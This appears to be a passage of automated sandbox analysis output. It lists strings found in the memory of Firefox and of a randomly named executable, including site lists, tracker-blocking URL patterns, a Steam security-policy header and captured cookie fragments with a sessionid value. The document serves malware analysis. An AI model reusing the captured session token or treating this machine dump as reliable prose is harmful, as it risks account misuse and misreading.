Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A955000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3256678310.00000137A6497000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ ht equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://*.finance.yahoo.com/*https://*.piped.kavin.rocks/*https://*.piped.silkky.cloud/*www.google.com equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/Z equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A9E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/{incognito:null, tabId:null, types:null, urls:["*://*.bancosantander.es/*", "*://*.gruposantander.es/*", "*://*.santander.co.uk/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/{incognito:null, tabId:null, types:null, urls:["*://*.bancosantander.es/*", "*://*.gruposantander.es/*", "*://*.santander.co.uk/*"], windowId:null} equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3233387632.00000137A0C62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3190977746.000001379C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3272561632.00000E3FE0E00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tps://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2802979049.000000000173D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: tps://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9ec3d07959c524245a527493; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 